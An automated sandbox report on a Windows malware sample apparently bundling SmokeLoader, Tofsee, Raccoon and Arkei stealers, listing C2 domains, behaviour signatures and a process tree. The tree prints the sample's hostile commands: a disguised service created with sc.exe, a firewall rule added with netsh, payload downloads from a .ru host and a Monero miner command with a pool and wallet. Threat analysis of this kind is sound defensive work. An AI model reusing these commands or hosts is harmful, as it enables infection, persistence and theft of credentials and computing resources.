Analysis

  • max time kernel
    151s
  • max time network
    152s
  • platform
    windows10_x64
  • resource
    win10-en-20211208
  • submitted
    09/01/2022, 19:12

General

  • Target

    60fa81403147d644a4b0707eb855e1c1d90954735ed134d254c413015f2dd96b.exe

  • Size

    290KB

  • MD5

    8e61e663bc84142fd7a5190b7303e9a2

  • SHA1

    8d8d7e1342520362c9df413540f811812a5b2de4

  • SHA256

    60fa81403147d644a4b0707eb855e1c1d90954735ed134d254c413015f2dd96b

  • SHA512

    d871d697c9f7225c5d54e20a6e8de981736d706be022487b43609df77788d481a8df381cc791b940e77928e8eced6387a76940c2af770084b9a9cdd3d5e906f4

Malware Config

Extracted

Family

smokeloader

Version

2020

C2

http://host-data-coin-11.com/

http://file-coin-host-12.com/

http://srtuiyhuali.at/

http://fufuiloirtu.com/

http://amogohuigotuli.at/

http://novohudosovu.com/

http://brutuilionust.com/

http://bubushkalioua.com/

http://dumuilistrati.at/

http://verboliatsiaeeees.com/

rc4.i32
rc4.i32
rc4.i32
rc4.i32

Extracted

Family

tofsee

C2

patmushta.info

parubey.info

Extracted

Family

raccoon

Version

1.8.4-hotfixs

rc4.plain

Signatures

  • Arkei

    Arkei is an infostealer written in C++.

  • LoaderBot

    LoaderBot is a loader written in .NET downloading and executing miners.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

  • Windows security bypass 2 TTPs
  • suricata: ET MALWARE Sharik/Smoke CnC Beacon 11

    suricata: ET MALWARE Sharik/Smoke CnC Beacon 11

  • suricata: ET MALWARE Single char EXE direct download likely trojan (multiple families)

    suricata: ET MALWARE Single char EXE direct download likely trojan (multiple families)

  • suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

    suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

  • Arkei Stealer Payload 5 IoCs
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • LoaderBot executable 1 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Creates new service(s) 1 TTPs
  • Downloads MZ/PE file
  • Executes dropped EXE 22 IoCs
  • Modifies Windows Firewall 1 TTPs
  • Sets service image path in registry 2 TTPs
  • UPX packed file 6 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Deletes itself 1 IoCs
  • Drops startup file 1 IoCs
  • Loads dropped DLL 3 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 5 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 2 IoCs
  • Checks SCSI registry key(s) 3 TTPs 9 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Modifies registry class 1 IoCs
  • Script User-Agent 1 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious behavior: MapViewOfSection 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\60fa81403147d644a4b0707eb855e1c1d90954735ed134d254c413015f2dd96b.exe
    "C:\Users\Admin\AppData\Local\Temp\60fa81403147d644a4b0707eb855e1c1d90954735ed134d254c413015f2dd96b.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:2520
    • C:\Users\Admin\AppData\Local\Temp\60fa81403147d644a4b0707eb855e1c1d90954735ed134d254c413015f2dd96b.exe
      "C:\Users\Admin\AppData\Local\Temp\60fa81403147d644a4b0707eb855e1c1d90954735ed134d254c413015f2dd96b.exe"
      2⤵
      • Checks SCSI registry key(s)
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      PID:3768
  • C:\Users\Admin\AppData\Local\Temp\3748.exe
    C:\Users\Admin\AppData\Local\Temp\3748.exe
    1⤵
    • Executes dropped EXE
    • Checks SCSI registry key(s)
    • Suspicious behavior: MapViewOfSection
    PID:3440
  • C:\Users\Admin\AppData\Local\Temp\5745.exe
    C:\Users\Admin\AppData\Local\Temp\5745.exe
    1⤵
    • Executes dropped EXE
    PID:524
  • C:\Users\Admin\AppData\Local\Temp\64C3.exe
    C:\Users\Admin\AppData\Local\Temp\64C3.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of WriteProcessMemory
    PID:2684
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\fsfqhvsd\
      2⤵
        PID:2172
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\exrdnjyx.exe" C:\Windows\SysWOW64\fsfqhvsd\
        2⤵
          PID:3636
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" create fsfqhvsd binPath= "C:\Windows\SysWOW64\fsfqhvsd\exrdnjyx.exe /d\"C:\Users\Admin\AppData\Local\Temp\64C3.exe\"" type= own start= auto DisplayName= "wifi support"
          2⤵
            PID:2576
          • C:\Windows\SysWOW64\sc.exe
            "C:\Windows\System32\sc.exe" description fsfqhvsd "wifi internet conection"
            2⤵
              PID:1180
            • C:\Windows\SysWOW64\sc.exe
              "C:\Windows\System32\sc.exe" start fsfqhvsd
              2⤵
                PID:2560
              • C:\Windows\SysWOW64\netsh.exe
                "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                2⤵
                  PID:1480
              • C:\Users\Admin\AppData\Local\Temp\6FD0.exe
                C:\Users\Admin\AppData\Local\Temp\6FD0.exe
                1⤵
                • Executes dropped EXE
                • Suspicious use of SetThreadContext
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of WriteProcessMemory
                PID:1428
                • C:\Users\Admin\AppData\Local\Temp\6FD0.exe
                  C:\Users\Admin\AppData\Local\Temp\6FD0.exe
                  2⤵
                  • Executes dropped EXE
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2088
              • C:\Windows\SysWOW64\fsfqhvsd\exrdnjyx.exe
                C:\Windows\SysWOW64\fsfqhvsd\exrdnjyx.exe /d"C:\Users\Admin\AppData\Local\Temp\64C3.exe"
                1⤵
                • Executes dropped EXE
                • Suspicious use of SetThreadContext
                • Suspicious use of WriteProcessMemory
                PID:1248
                • C:\Windows\SysWOW64\svchost.exe
                  svchost.exe
                  2⤵
                    PID:3960
                • C:\Windows\SysWOW64\explorer.exe
                  C:\Windows\SysWOW64\explorer.exe
                  1⤵
                  • Accesses Microsoft Outlook profiles
                  • outlook_office_path
                  • outlook_win_path
                  PID:3872
                • C:\Windows\explorer.exe
                  C:\Windows\explorer.exe
                  1⤵
                    PID:3532
                  • C:\Users\Admin\AppData\Local\Temp\DC66.exe
                    C:\Users\Admin\AppData\Local\Temp\DC66.exe
                    1⤵
                    • Executes dropped EXE
                    • Suspicious use of SetThreadContext
                    • Suspicious use of WriteProcessMemory
                    PID:3500
                    • C:\Users\Admin\AppData\Local\Temp\DC66.exe
                      C:\Users\Admin\AppData\Local\Temp\DC66.exe
                      2⤵
                      • Executes dropped EXE
                      • Checks SCSI registry key(s)
                      • Suspicious behavior: MapViewOfSection
                      PID:3736
                  • C:\Users\Admin\AppData\Local\Temp\EF72.exe
                    C:\Users\Admin\AppData\Local\Temp\EF72.exe
                    1⤵
                    • Executes dropped EXE
                    • Checks BIOS information in registry
                    • Loads dropped DLL
                    • Checks whether UAC is enabled
                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                    • Checks processor information in registry
                    PID:628
                    • C:\Windows\SysWOW64\cmd.exe
                      "C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\AppData\Local\Temp\EF72.exe" & exit
                      2⤵
                        PID:920
                        • C:\Windows\SysWOW64\timeout.exe
                          timeout /t 5
                          3⤵
                          • Delays execution with timeout.exe
                          PID:3312
                    • C:\Users\Admin\AppData\Local\Temp\A0F.exe
                      C:\Users\Admin\AppData\Local\Temp\A0F.exe
                      1⤵
                      • Executes dropped EXE
                      PID:1044
                      • C:\Windows\SysWOW64\WerFault.exe
                        C:\Windows\SysWOW64\WerFault.exe -u -p 1044 -s 872
                        2⤵
                        • Suspicious use of NtCreateProcessExOtherParentProcess
                        • Program crash
                        • Suspicious use of AdjustPrivilegeToken
                        PID:3384
                    • C:\Users\Admin\AppData\Local\Temp\2C7D.exe
                      C:\Users\Admin\AppData\Local\Temp\2C7D.exe
                      1⤵
                      • Executes dropped EXE
                      • Suspicious use of AdjustPrivilegeToken
                      PID:1152
                    • C:\Users\Admin\AppData\Local\Temp\4B9F.exe
                      C:\Users\Admin\AppData\Local\Temp\4B9F.exe
                      1⤵
                      • Executes dropped EXE
                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                      PID:1380
                    • C:\Users\Admin\AppData\Local\Temp\5B4F.exe
                      C:\Users\Admin\AppData\Local\Temp\5B4F.exe
                      1⤵
                      • Executes dropped EXE
                      PID:2068
                      • C:\Windows\System32\cmd.exe
                        "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\5BE2.tmp\5BE3.tmp\5BE4.bat C:\Users\Admin\AppData\Local\Temp\5B4F.exe"
                        2⤵
                        • Modifies registry class
                        PID:2000
                        • C:\Users\Admin\AppData\Local\Temp\5BE2.tmp\5BE3.tmp\extd.exe
                          C:\Users\Admin\AppData\Local\Temp\5BE2.tmp\5BE3.tmp\extd.exe "/hideself" "" "" "" "" "" "" "" ""
                          3⤵
                          • Executes dropped EXE
                          PID:2720
                        • C:\Windows\System32\WScript.exe
                          "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\12395\123.vbs"
                          3⤵
                          • Blocklisted process makes network request
                          PID:2700
                        • C:\Users\Admin\AppData\Local\Temp\5BE2.tmp\5BE3.tmp\extd.exe
                          C:\Users\Admin\AppData\Local\Temp\5BE2.tmp\5BE3.tmp\extd.exe "/download" "http://a0617224.xsph.ru/1.exe" "setup1.exe" "" "" "" "" "" ""
                          3⤵
                          • Executes dropped EXE
                          PID:3820
                        • C:\Users\Admin\AppData\Local\Temp\12395\setup1.exe
                          setup1.exe
                          3⤵
                          • Executes dropped EXE
                          PID:744
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -u -p 744 -s 412
                            4⤵
                            • Program crash
                            • Suspicious use of AdjustPrivilegeToken
                            PID:4088
                        • C:\Users\Admin\AppData\Local\Temp\5BE2.tmp\5BE3.tmp\extd.exe
                          C:\Users\Admin\AppData\Local\Temp\5BE2.tmp\5BE3.tmp\extd.exe "/download" "http://a0617224.xsph.ru/2.exe" "setup2.exe" "" "" "" "" "" ""
                          3⤵
                          • Executes dropped EXE
                          PID:792
                        • C:\Users\Admin\AppData\Local\Temp\12395\setup2.exe
                          setup2.exe
                          3⤵
                          • Executes dropped EXE
                          • Adds Run key to start application
                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                          PID:1184
                        • C:\Users\Admin\AppData\Local\Temp\5BE2.tmp\5BE3.tmp\extd.exe
                          C:\Users\Admin\AppData\Local\Temp\5BE2.tmp\5BE3.tmp\extd.exe "/download" "http://a0617224.xsph.ru/3.exe" "setup3.exe" "" "" "" "" "" ""
                          3⤵
                          • Executes dropped EXE
                          PID:3208
                        • C:\Users\Admin\AppData\Local\Temp\12395\setup3.exe
                          setup3.exe
                          3⤵
                          • Executes dropped EXE
                          • Drops startup file
                          • Adds Run key to start application
                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                          PID:1220
                          • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
                            "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 1
                            4⤵
                            • Executes dropped EXE
                            PID:1628
                        • C:\Users\Admin\AppData\Local\Temp\5BE2.tmp\5BE3.tmp\extd.exe
                          C:\Users\Admin\AppData\Local\Temp\5BE2.tmp\5BE3.tmp\extd.exe "" "" "" "" "" "" "" "" ""
                          3⤵
                          • Executes dropped EXE
                          PID:1792

                    Network

                    MITRE ATT&CK Enterprise v6

                    Replay Monitor

                    Loading Replay Monitor...

                    Downloads

                    • memory/524-132-0x0000000000400000-0x0000000002B86000-memory.dmp

                      Filesize

                      39.5MB

                    • memory/524-131-0x0000000002CD0000-0x0000000002E1A000-memory.dmp

                      Filesize

                      1.3MB

                    • memory/524-130-0x0000000002CD0000-0x0000000002E1A000-memory.dmp

                      Filesize

                      1.3MB

                    • memory/628-204-0x0000000000900000-0x0000000000CBF000-memory.dmp

                      Filesize

                      3.7MB

                    • memory/628-207-0x0000000000900000-0x0000000000CBF000-memory.dmp

                      Filesize

                      3.7MB

                    • memory/628-217-0x00000000773B0000-0x000000007753E000-memory.dmp

                      Filesize

                      1.6MB

                    • memory/628-216-0x0000000000900000-0x0000000000CBF000-memory.dmp

                      Filesize

                      3.7MB

                    • memory/628-215-0x0000000000900000-0x0000000000CBF000-memory.dmp

                      Filesize

                      3.7MB

                    • memory/628-214-0x0000000000900000-0x0000000000CBF000-memory.dmp

                      Filesize

                      3.7MB

                    • memory/628-213-0x0000000000900000-0x0000000000CBF000-memory.dmp

                      Filesize

                      3.7MB

                    • memory/628-212-0x0000000000900000-0x0000000000CBF000-memory.dmp

                      Filesize

                      3.7MB

                    • memory/628-211-0x0000000000900000-0x0000000000CBF000-memory.dmp

                      Filesize

                      3.7MB

                    • memory/628-200-0x0000000000900000-0x0000000000CBF000-memory.dmp

                      Filesize

                      3.7MB

                    • memory/628-209-0x0000000074120000-0x00000000742E2000-memory.dmp

                      Filesize

                      1.8MB

                    • memory/628-208-0x0000000000050000-0x0000000000051000-memory.dmp

                      Filesize

                      4KB

                    • memory/628-201-0x0000000000900000-0x0000000000CBF000-memory.dmp

                      Filesize

                      3.7MB

                    • memory/628-206-0x0000000000900000-0x0000000000CBF000-memory.dmp

                      Filesize

                      3.7MB

                    • memory/628-205-0x0000000000900000-0x0000000000CBF000-memory.dmp

                      Filesize

                      3.7MB

                    • memory/628-203-0x0000000000900000-0x0000000000CBF000-memory.dmp

                      Filesize

                      3.7MB

                    • memory/628-202-0x0000000000820000-0x00000000008CE000-memory.dmp

                      Filesize

                      696KB

                    • memory/1044-222-0x0000000004800000-0x0000000004891000-memory.dmp

                      Filesize

                      580KB

                    • memory/1044-221-0x00000000047B0000-0x00000000047FF000-memory.dmp

                      Filesize

                      316KB

                    • memory/1044-223-0x0000000000400000-0x0000000002BC5000-memory.dmp

                      Filesize

                      39.8MB

                    • memory/1152-237-0x0000000004B30000-0x000000000502E000-memory.dmp

                      Filesize

                      5.0MB

                    • memory/1152-243-0x00000000057A0000-0x00000000057EB000-memory.dmp

                      Filesize

                      300KB

                    • memory/1152-242-0x0000000005750000-0x000000000578E000-memory.dmp

                      Filesize

                      248KB

                    • memory/1152-241-0x0000000005640000-0x000000000574A000-memory.dmp

                      Filesize

                      1.0MB

                    • memory/1152-240-0x0000000004AB0000-0x0000000004AC2000-memory.dmp

                      Filesize

                      72KB

                    • memory/1152-239-0x0000000005030000-0x0000000005636000-memory.dmp

                      Filesize

                      6.0MB

                    • memory/1152-238-0x00000000049D0000-0x0000000004A02000-memory.dmp

                      Filesize

                      200KB

                    • memory/1152-235-0x0000000004B20000-0x0000000004B21000-memory.dmp

                      Filesize

                      4KB

                    • memory/1152-234-0x0000000000400000-0x000000000047B000-memory.dmp

                      Filesize

                      492KB

                    • memory/1152-232-0x0000000000521000-0x000000000054D000-memory.dmp

                      Filesize

                      176KB

                    • memory/1152-233-0x0000000000480000-0x000000000052E000-memory.dmp

                      Filesize

                      696KB

                    • memory/1152-236-0x0000000002460000-0x0000000002494000-memory.dmp

                      Filesize

                      208KB

                    • memory/1184-300-0x0000000074120000-0x00000000742E2000-memory.dmp

                      Filesize

                      1.8MB

                    • memory/1184-297-0x00000000005D0000-0x00000000005D1000-memory.dmp

                      Filesize

                      4KB

                    • memory/1184-298-0x0000000000890000-0x00000000008F2000-memory.dmp

                      Filesize

                      392KB

                    • memory/1184-306-0x00000000754F0000-0x0000000076838000-memory.dmp

                      Filesize

                      19.3MB

                    • memory/1184-301-0x00000000750F0000-0x00000000751E1000-memory.dmp

                      Filesize

                      964KB

                    • memory/1184-305-0x0000000076900000-0x0000000076E84000-memory.dmp

                      Filesize

                      5.5MB

                    • memory/1184-304-0x0000000073470000-0x00000000734F0000-memory.dmp

                      Filesize

                      512KB

                    • memory/1220-323-0x00000000750F0000-0x00000000751E1000-memory.dmp

                      Filesize

                      964KB

                    • memory/1220-320-0x0000000074120000-0x00000000742E2000-memory.dmp

                      Filesize

                      1.8MB

                    • memory/1220-319-0x00000000005D0000-0x00000000005D1000-memory.dmp

                      Filesize

                      4KB

                    • memory/1220-329-0x0000000076900000-0x0000000076E84000-memory.dmp

                      Filesize

                      5.5MB

                    • memory/1220-330-0x00000000754F0000-0x0000000076838000-memory.dmp

                      Filesize

                      19.3MB

                    • memory/1220-328-0x0000000073470000-0x00000000734F0000-memory.dmp

                      Filesize

                      512KB

                    • memory/1220-317-0x0000000000DE0000-0x000000000123B000-memory.dmp

                      Filesize

                      4.4MB

                    • memory/1248-162-0x0000000002B90000-0x0000000002CDA000-memory.dmp

                      Filesize

                      1.3MB

                    • memory/1248-161-0x0000000002B90000-0x0000000002CDA000-memory.dmp

                      Filesize

                      1.3MB

                    • memory/1248-163-0x0000000000400000-0x0000000002B83000-memory.dmp

                      Filesize

                      39.5MB

                    • memory/1380-251-0x0000000000050000-0x0000000000051000-memory.dmp

                      Filesize

                      4KB

                    • memory/1380-250-0x0000000000FB0000-0x0000000001091000-memory.dmp

                      Filesize

                      900KB

                    • memory/1380-253-0x00000000750F0000-0x00000000751E1000-memory.dmp

                      Filesize

                      964KB

                    • memory/1380-257-0x0000000073470000-0x00000000734F0000-memory.dmp

                      Filesize

                      512KB

                    • memory/1380-267-0x0000000076900000-0x0000000076E84000-memory.dmp

                      Filesize

                      5.5MB

                    • memory/1380-252-0x0000000074120000-0x00000000742E2000-memory.dmp

                      Filesize

                      1.8MB

                    • memory/1380-268-0x00000000754F0000-0x0000000076838000-memory.dmp

                      Filesize

                      19.3MB

                    • memory/1380-270-0x00000000701B0000-0x00000000701FB000-memory.dmp

                      Filesize

                      300KB

                    • memory/1428-142-0x0000000000400000-0x000000000048A000-memory.dmp

                      Filesize

                      552KB

                    • memory/1428-156-0x00000000054E0000-0x00000000059DE000-memory.dmp

                      Filesize

                      5.0MB

                    • memory/1428-149-0x00000000026E0000-0x00000000026E1000-memory.dmp

                      Filesize

                      4KB

                    • memory/1428-148-0x0000000004D60000-0x0000000004D61000-memory.dmp

                      Filesize

                      4KB

                    • memory/1428-145-0x0000000004C70000-0x0000000004CE6000-memory.dmp

                      Filesize

                      472KB

                    • memory/1428-151-0x0000000004C50000-0x0000000004C6E000-memory.dmp

                      Filesize

                      120KB

                    • memory/1428-143-0x0000000000400000-0x000000000048A000-memory.dmp

                      Filesize

                      552KB

                    • memory/1628-339-0x00000000001B0000-0x00000000001C4000-memory.dmp

                      Filesize

                      80KB

                    • memory/2084-126-0x0000000002730000-0x0000000002746000-memory.dmp

                      Filesize

                      88KB

                    • memory/2084-210-0x0000000004240000-0x0000000004256000-memory.dmp

                      Filesize

                      88KB

                    • memory/2084-119-0x0000000000950000-0x0000000000966000-memory.dmp

                      Filesize

                      88KB

                    • memory/2088-174-0x0000000004F60000-0x0000000004F9E000-memory.dmp

                      Filesize

                      248KB

                    • memory/2088-183-0x0000000007210000-0x000000000773C000-memory.dmp

                      Filesize

                      5.2MB

                    • memory/2088-171-0x0000000005530000-0x0000000005B36000-memory.dmp

                      Filesize

                      6.0MB

                    • memory/2088-172-0x00000000029E0000-0x00000000029F2000-memory.dmp

                      Filesize

                      72KB

                    • memory/2088-173-0x0000000005030000-0x000000000513A000-memory.dmp

                      Filesize

                      1.0MB

                    • memory/2088-175-0x0000000004FA0000-0x0000000004FEB000-memory.dmp

                      Filesize

                      300KB

                    • memory/2088-176-0x0000000004F20000-0x0000000005526000-memory.dmp

                      Filesize

                      6.0MB

                    • memory/2088-169-0x0000000000400000-0x0000000000420000-memory.dmp

                      Filesize

                      128KB

                    • memory/2088-177-0x0000000005260000-0x00000000052C6000-memory.dmp

                      Filesize

                      408KB

                    • memory/2088-165-0x0000000000400000-0x0000000000420000-memory.dmp

                      Filesize

                      128KB

                    • memory/2088-181-0x0000000005E10000-0x0000000005E2E000-memory.dmp

                      Filesize

                      120KB

                    • memory/2088-182-0x0000000006B10000-0x0000000006CD2000-memory.dmp

                      Filesize

                      1.8MB

                    • memory/2088-178-0x0000000006140000-0x000000000663E000-memory.dmp

                      Filesize

                      5.0MB

                    • memory/2088-170-0x0000000000400000-0x0000000000420000-memory.dmp

                      Filesize

                      128KB

                    • memory/2088-179-0x0000000005D10000-0x0000000005D86000-memory.dmp

                      Filesize

                      472KB

                    • memory/2088-180-0x0000000005E30000-0x0000000005EC2000-memory.dmp

                      Filesize

                      584KB

                    • memory/2520-117-0x0000000002CA0000-0x0000000002CA9000-memory.dmp

                      Filesize

                      36KB

                    • memory/2520-118-0x0000000002CC0000-0x0000000002E0A000-memory.dmp

                      Filesize

                      1.3MB

                    • memory/2684-139-0x0000000002CF0000-0x0000000002CFD000-memory.dmp

                      Filesize

                      52KB

                    • memory/2684-140-0x0000000002D00000-0x0000000002D13000-memory.dmp

                      Filesize

                      76KB

                    • memory/2684-141-0x0000000000400000-0x0000000002B83000-memory.dmp

                      Filesize

                      39.5MB

                    • memory/3440-124-0x0000000000470000-0x00000000005BA000-memory.dmp

                      Filesize

                      1.3MB

                    • memory/3440-123-0x0000000000643000-0x0000000000654000-memory.dmp

                      Filesize

                      68KB

                    • memory/3440-125-0x0000000000400000-0x000000000046D000-memory.dmp

                      Filesize

                      436KB

                    • memory/3500-196-0x0000000002BE0000-0x0000000002BE9000-memory.dmp

                      Filesize

                      36KB

                    • memory/3532-189-0x00000000012C0000-0x00000000012CC000-memory.dmp

                      Filesize

                      48KB

                    • memory/3532-188-0x00000000012D0000-0x00000000012D7000-memory.dmp

                      Filesize

                      28KB

                    • memory/3768-115-0x0000000000400000-0x0000000000409000-memory.dmp

                      Filesize

                      36KB

                    • memory/3872-186-0x0000000000600000-0x000000000066B000-memory.dmp

                      Filesize

                      428KB

                    • memory/3872-185-0x0000000000670000-0x00000000006E4000-memory.dmp

                      Filesize

                      464KB

                    • memory/3960-157-0x0000000000790000-0x00000000007A5000-memory.dmp

                      Filesize

                      84KB

                    • memory/3960-160-0x00000000006A0000-0x00000000006A1000-memory.dmp

                      Filesize

                      4KB

                    • memory/3960-164-0x0000000000790000-0x00000000007A5000-memory.dmp

                      Filesize

                      84KB

                    • memory/3960-159-0x00000000006A0000-0x00000000006A1000-memory.dmp

                      Filesize

                      4KB